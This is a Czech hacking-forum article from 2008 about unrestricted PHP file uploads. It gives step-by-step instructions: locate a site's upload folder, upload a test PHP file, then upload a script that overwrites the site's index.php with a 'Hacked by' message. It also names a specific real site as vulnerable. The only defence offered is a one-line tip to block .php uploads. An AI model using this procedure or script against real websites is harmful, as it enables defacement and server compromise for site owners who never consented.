Máte bezpečnou aplikaci? - II.

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: xenix001_
Datum: 7.2.2008
Hodnocení/Hlasovalo: 0/0

Problematika uploadů na web...

Určitě už jste se setkali s něakým upload fórem nebo, alespoň na něakém obyčejném webu. Zdá se bezpečné, ale když majitel nezakáže soubory s příponou .php tak se to dá jednoduše zneužít a o tom bude můj článek vypovídat.
Postup je jednoduchý:
1.Většinou jsou soubory nahrávány někam do složky většinou upload .
Samozdřejmě si to můžete zjistit když do baru za :
http://neco.cz
Napíšete :
upload/
A když to hodí chybu Forbidden nebo-li chybu číslo 403. Tak nejspíš chyba existuje, ale to jsme teprve zjistili kam se soubory ukládají.
Samozdřejmě, že se soubory mohou ukládat jinam, ale to musíte zjistit bývá to ve složkách:
file, data, upload, Upload, dokumenty, obrazky...
2.Skusíme nahrát něaký soubor s obsahem:
<? echo("123"); ?>
Pojmenujete ho třeba jako xx.php a nahrajete. V tomto případě jak už jsme se u prvního bodu jakoby domluvili bude to ve složce upload.
Takže když už to bude nahraný tak se skusíme kouknout na link :
http://neco.cz/upload/xx.php
Jde ? Vypsalo se 123 ? Supr...
3.Potom si napíšeme php script ve tvaru :

<?
$text = "Hacked by nekdo";
$soubor = fopen("../index.php", "w+");
fwrite($soubor, $text);
fclose($soubor);
?>

Pojmenujeme xx2.php a nahrajeme.
Koukneme se na :
http://neco.cz/upload/xx2.php
Tím script aktivujem a už zbyde poslední krok ...
4.Koukneme se na :
http://neco.cz/
Hotovo...
-------------------------------------------------------
Připomínky :
$soubor = fopen("../index.php", "w+"); - ../ Znamená o adresář níž
Chyba například existuje na :
www.liteupload.wz.cz
Obrana :
Stáhněte něaký prověřený script. Nebo si napište svůj a zakažte soubory s koncovkou .php ;) A nazapomeňte si to podle návodu ozkoušet na svém uploadu.
Do krásného dne,
-=[xenix001]=-